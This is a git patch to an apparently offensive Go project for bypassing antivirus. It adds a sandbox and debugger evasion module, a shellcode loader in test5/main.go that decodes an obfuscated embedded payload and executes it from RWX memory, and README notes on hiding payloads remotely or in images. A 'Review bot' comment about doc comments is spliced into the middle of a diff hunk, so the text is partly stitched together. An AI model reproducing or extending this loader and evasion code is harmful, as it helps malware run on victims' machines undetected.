From 7fa29a0d1d7ab0e08da6ba2fc61529ec73826bbf Mon Sep 17 00:00:00 2001 From: Administrator <1850597152@qq.com> Date: Tue, 17 Aug 2021 00:03:56 +0800 Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=8A=A0=E6=B2=99=E7=AE=B1=E6=A3=80?= =?UTF-8?q?=E6=B5=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 11 +++ sandbox/sandbox.go | 242 +++++++++++++++++++++++++++++++++++++++++++++ test3/main.go | 5 +- test5/main.go | 126 +++++++++++++++++++++++ 4 files changed, 382 insertions(+), 2 deletions(-) create mode 100644 sandbox/sandbox.go create mode 100644 test5/main.go diff --git a/README.md b/README.md index cb0e3da..165aa36 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,10 @@ ## 思路 静态免杀比较简单,可选加密payload或者分离payload。 分离免杀效果比加密payload的效果要好。 +初次之外还可以考虑如下方式: +由于要引入net包,导致文件大小比较大。我不做测试了。 +把payload分离远程服务器 +把payload隐写到图片 ## 说明 test1、test2效果还可以。 @@ -27,3 +31,10 @@ go build -ldflags="-s -w" -o main1.exe go build -ldflags="-s -w -H=windowsgui" -o main2.exe ``` + + + +## 参考 +https://github.com/brimstone/go-shellcode +https://github.com/timwhitez/Doge-Loader +https://github.com/fcre1938/goShellCodeByPassVT \ No newline at end of file diff --git a/sandbox/sandbox.go b/sandbox/sandbox.go new file mode 100644 index 0000000..2c9bd13 --- /dev/null +++ b/sandbox/sandbox.go 
@@ -0,0 +1,242 @@
+package sandbox
+
+import (
+ "os"
+ "os/user"
+ "path/filepath"
+ "strings"
+ "syscall"
+ "unsafe"
+)
+
+type PROCESSENTRY32 struct {
+ dwSize uint32
+ cntUsage uint32
+ th32ProcessID uint32
+ th32DefaultHeapID uintptr
+ th32ModuleID uint32
+ cntThreads uint32
+ th32ParentProcessID uint32
+ pcPriClassBase int32
+ dwFlags uint32
+ szExeFile [260]uint16
+}
+
+var (
+ kernel322 = syscall.NewLazyDLL("kernel32.dll")
+ CreateToolhelp32Snapshot = kernel322.NewProc("CreateToolhelp32Snapshot")
+ Process32First = kernel322.NewProc("Process32FirstW")
+ Process32Next = kernel322.NewProc("Process32NextW")
+ CloseHandle = kernel322.NewProc("CloseHandle")
+)
+
+var (
+ //在此处添加沙箱常见用户名
+ userNames = []string{
+ "John", "Phil",
+ }
+ //在此处添加沙箱常见主机名
+ hostNames = []string{
+ "John", "Jason",
+ }
+)
+
+func checkUserName(param interface{}) (code int) {
+ username, err := user.Current()
+ if err != nil {
+ return 1
+ }
+ names, ok := param.([]string)
+ if !ok {
+ //fmt.Println("user names must be []string")
+ return 1
+ }
+ for _, name := range names {
+ if strings.Contains(strings.ToLower(username.Username), strings.ToLower(name)) {
+ return 0
+ }
+ }
+ //fmt.Printf("1.UserName OK!\n")
+ return -1
+}
+
+func checkDebugger(param interface{}) (code int) {
+ var kernel32, _ = syscall.LoadLibrary("kernel32.dll")
+ var IsDebuggerPresent, _ = syscall.GetProcAddress(kernel32, "IsDebuggerPresent")
+ var nargs uintptr = 0
+
+ if debuggerPresent, _, err := syscall.Syscall(uintptr(IsDebuggerPresent), nargs, 0, 0, 0); err != 0 {
+ //fmt.Printf("Error determining whether debugger present.\n")
+ } else {
+ if debuggerPresent != 0 {
+ return 0
+ }
+ }
+ //fmt.Printf("2.Debugger OK!\n")
+ return -1
+}
+
+func checkFileName(param interface{}) (code int) {
+ length, ok := param.(int)
+ if !ok {
+ //fmt.Println("the length of filename must be integer")
+ return 1
+ }
+ actualName := filepath.Base(os.Args[0])
+ if len(actualName) >= length {
+ return 0
+ }
+ //fmt.Printf("3.FileName OK!\n")
+ return -1
+}
+
+func checkProcessNum(param interface{}) (code int) {
+ minRunningProcesses, ok := param.(int)
+ if !ok {
+ //fmt.Println("the number of process must be integer")
+ return 1
+ }
+ hProcessSnap, _, _ := CreateToolhelp32Snapshot.Call(2, 0)
+ if hProcessSnap < 0 {
+ return -1
+ }
+ defer CloseHandle.Call(hProcessSnap)
+
+ exeNames := make([]string, 0, 100)
+ var pe32 PROCESSENTRY32
+ pe32.dwSize = uint32(unsafe.Sizeof(pe32))
+
+ Process32First.Call(hProcessSnap, uintptr(unsafe.Pointer(&pe32)))
+
+ for {
+
+ exeNames = append(exeNames, syscall.UTF16ToString(pe32.szExeFile[:260]))
+
+ retVal, _, _ := Process32Next.Call(hProcessSnap, uintptr(unsafe.Pointer(&pe32)))
+ if retVal == 0 {
+ break
+ }
+
+ }
+ runningProcesses := 0
+ for range exeNames {
+ runningProcesses += 1
+ }
+
+ if runningProcesses < minRunningProcesses {
+ return 0
+ }
+ //fmt.Printf("4.ProcessNum OK!\n")
+ return -1
+}
+
+func checkDiskSize(param interface{}) (code int) {
+ minDiskSizeGB, ok := param.(float32)
+ if !ok {
+ //fmt.Println("the size of disk must be float32")
+ return 1
+ }
+ //var kernel323 = syscall.NewLazyDLL("kernel32.dll")
+ var (
+ getDiskFreeSpaceEx = kernel322.NewProc("GetDiskFreeSpaceExW")
+ lpFreeBytesAvailable, lpTotalNumberOfBytes, lpTotalNumberOfFreeBytes int64
+ )
+
+ getDiskFreeSpaceEx.Call(
+ uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),
+ uintptr(unsafe.Pointer(&lpFreeBytesAvailable)),
+ uintptr(unsafe.Pointer(&lpTotalNumberOfBytes)),
+ uintptr(unsafe.Pointer(&lpTotalNumberOfFreeBytes)))
+
+ diskSizeGB := float32(lpTotalNumberOfBytes) / 1073741824
+ //fmt.Println(diskSizeGB)
+ if diskSizeGB < minDiskSizeGB {
+ return 0
+ }
+ //fmt.Printf("5.DiskSize OK!\n")
+ return -1
+}
+func checkHostName(param interface{}) (code int) {
+ hosts, ok := param.([]string)
+ if !ok {
+ //fmt.Println("slice of hostname must be []string")
+ return 1
+ }
+ hostname, errorout := os.Hostname()
+ if errorout != nil {
+ os.Exit(1)
+ }
+ for _, host := range hosts {
+ if strings.Contains(strings.ToLower(hostname), strings.ToLower(host)) {
+ return 0
+ }
+ }
+ //fmt.Printf("7.HostName OK!\n")
+ return -1
+}
+
+func checkBlacklist(param interface{}) (code int) {
+ EvidenceOfSandbox := make([]string, 0)
+ //在此处添加进程黑名单
+ sandboxProcesses := [...]string{`sysdiag`, `sysdiag-gui`, `usysdiag`, `Dbgview`}
+ hProcessSnap1, _, _ := CreateToolhelp32Snapshot.Call(2, 0)
+ if hProcessSnap1 < 0 {
+ return -1
+ }
+ defer CloseHandle.Call(hProcessSnap1)
+
+ exeNames := make([]string, 0, 100)
+ var pe32 PROCESSENTRY32
+ pe32.dwSize = uint32(unsafe.Sizeof(pe32))
+
+ Process32First.Call(hProcessSnap1, uintptr(unsafe.Pointer(&pe32)))
+
+ for {
+
+ exeNames = append(exeNames, syscall.UTF16ToString(pe32.szExeFile[:260]))
+
+ retVal, _, _ := Process32Next.Call(hProcessSnap1, uintptr(unsafe.Pointer(&pe32)))
+ if retVal == 0 {
+ break
+ }
+
+ }
+
+ for _, exe := range exeNames {
+ for _, sandboxProc := range sandboxProcesses {
+ if strings.Contains(strings.ToLower(exe), strings.ToLower(sandboxProc)) {
+ EvidenceOfSandbox = append(EvidenceOfSandbox, exe)
+ }
+ }
+ }
+
+ if len(EvidenceOfSandbox) != 0 {
+ return 0
+ }
+ //fmt.Printf("6.Blacklist OK!\n")
+ return -1
+}
+
+func exec1(fn func(interface{}) int, param interface{}) {
+ if code := fn(param); code >= 0 {
+ os.Exit(code)
+ }
+}
+
+func Check() {
+ //反沙箱(选用)
+ //检测用户名
+ exec1(checkUserName, userNames)
+ //判断hostname是否为黑名单
+ exec1(checkHostName, hostNames)
+ //检测进程数量是否大于后面输入的数
+ exec1(checkProcessNum, 50)
+ //检测系统盘是否大于后面输入的数
+ exec1(checkDiskSize, float32(60))
+ //检测调试器
+ exec1(checkDebugger, nil)
+ //检测文件名长度是否大于后面输入的数
+ exec1(checkFileName, 12)
+ //判断进程名是否为黑名单
+ exec1(checkBlacklist, nil)
+}
diff --git a/test3/main.go b/test3/main.go
index f4e2f5a..84ad6de 100644
--- a/test3/main.go
+++ b/test3/main.go
@@ -13,6 +13,7 @@ const (
 MEM_COMMIT = 0x1000
 MEM_RESERVE = 0x2000
 PAGE_EXECUTE_READWRITE = 0x40
+ PAGE_EXECUTE = 0x10
 PAGE_READWRITE = 0x04
 )
 
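Review bot: The exported `Check` and `PROCESSENTRY32` in sandbox/sandbox.go have no doc comments, and nothing states the three-way return convention the check functions share (0 when the probe matches, 1 when the probe cannot run or gets a parameter of the wrong type, -1 when it passes), which `exec1` turns into an immediate `os.Exit` for any non-negative code. I'd put `// Check runs each environment probe in turn; a probe returning 0 or 1 makes exec1 exit the process with that code, so Check returns to the caller only when every probe reports -1.` above `func Check()`, and `// exec1 calls fn and terminates the process with its code when the code is non-negative.` above `exec1`. `PROCESSENTRY32` could likewise note that it appears to mirror the Win32 structure of the same name and that `szExeFile` is read back as a NUL-terminated UTF-16 string via `syscall.UTF16ToString`. `checkHostName` also departs from the convention by calling `os.Exit(1)` directly when `os.Hostname` fails rather than returning 1 like the sibling checks; worth a comment if that is deliberate.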
@@ -92,8 +93,8 @@ func genEXE(charcode []byte) {
 }
 gd()
 var oldshellcodeperms uint32
- //改成读写执行
- virtualProtect1(unsafe.Pointer(&addr), uintptr(len(charcode)), PAGE_EXECUTE_READWRITE, unsafe.Pointer(&oldshellcodeperms))
+ //改成可执行
+ virtualProtect1(unsafe.Pointer(&addr), uintptr(len(charcode)), PAGE_EXECUTE, unsafe.Pointer(&oldshellcodeperms))
 _, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
 checkError(err)
diff --git a/test5/main.go b/test5/main.go
new file mode 100644
index 0000000..673eb21
--- /dev/null
+++ b/test5/main.go
@@ -0,0 +1,126 @@
+package main
+
+import (
+ "GolangBypassAV/encry"
+ "GolangBypassAV/sandbox"
+ "encoding/base64"
+ "fmt"
+ "os"
+ "syscall"
+ "time"
+ "unsafe"
+)
+
+const (
+ MEM_COMMIT = 0x1000
+ MEM_RESERVE = 0x2000
+ PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var kk = []byte{0x11}
+
+func base64Decode(data string) []byte {
+ data1, _ := base64.StdEncoding.DecodeString(data)
+ return data1
+}
+
+func base64Encode(data []byte) string {
+ bdata := base64.StdEncoding.EncodeToString(data)
+ return bdata
+}
+
+func getEnCode(data []byte) string {
+ bdata := base64.StdEncoding.EncodeToString(data)
+
+ bydata := []byte(bdata)
+ var shellcode []byte
+
+ for i := 0; i < len(bydata); i++ {
+ shellcode = append(shellcode, bydata[i]+kk[0])
+ }
+ return base64.StdEncoding.EncodeToString(shellcode)
+}
+
+var (
+ kernel32 = syscall.MustLoadDLL("kernel32.dll")
+ ntdll = syscall.MustLoadDLL("ntdll.dll")
+ VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
+ RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
+)
+
+func getDeCode(string2 string) []byte {
+
+ ss, _ := base64.StdEncoding.DecodeString(string2)
+ string2 = string(ss)
+ var shellcode []byte
+
+ bydata := []byte(string2)
+
+ for i := 0; i < len(bydata); i++ {
+ shellcode = append(shellcode, bydata[i]-kk[0])
+ }
+ ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+ return ssb
+
+}
+
+func checkError(err error) {
+ if err != nil {
+ if err.Error() != "The operation completed successfully." {
+ println(err.Error())
+ os.Exit(1)
+ }
+ }
+}
+
+func genEXE(charcode []byte) {
+
+ addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+ if addr == 0 {
+ checkError(err)
+ }
+ gd()
+
+ _, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+ checkError(err)
+
+ gd()
+ for j := 0; j < len(charcode); j++ {
+ charcode[j] = 0
+ }
+ syscall.Syscall(addr, 0, 0, 0, 0)
+}
+
+func gd() int64 {
+ time.Sleep(time.Duration(2) * time.Second)
+
+ dd := time.Now().UTC().UnixNano()
+ return dd + 123456
+
+}
+
+func getFileShellCode(file string) []byte {
+ data := encry.ReadFile(file)
+ //shellCodeHex := encry.GetBase64Data(data)
+ //fmt.Print(shellCodeHex)
+ return data
+}
+
+func getFileShellCode1(file string) string {
+ data := encry.ReadFile(file)
+ shellCodeHex := base64Encode(data)
+ fmt.Print(shellCodeHex)
+ return shellCodeHex
+}
+
+func main() {
+ //fmt.Println(1)
+
+ //fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
+ sandbox.Check()
+
+ bbdata := "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"
+ shellCodeHex := getDeCode(bbdata)
+ gd()
+ genEXE(shellCodeHex)
+}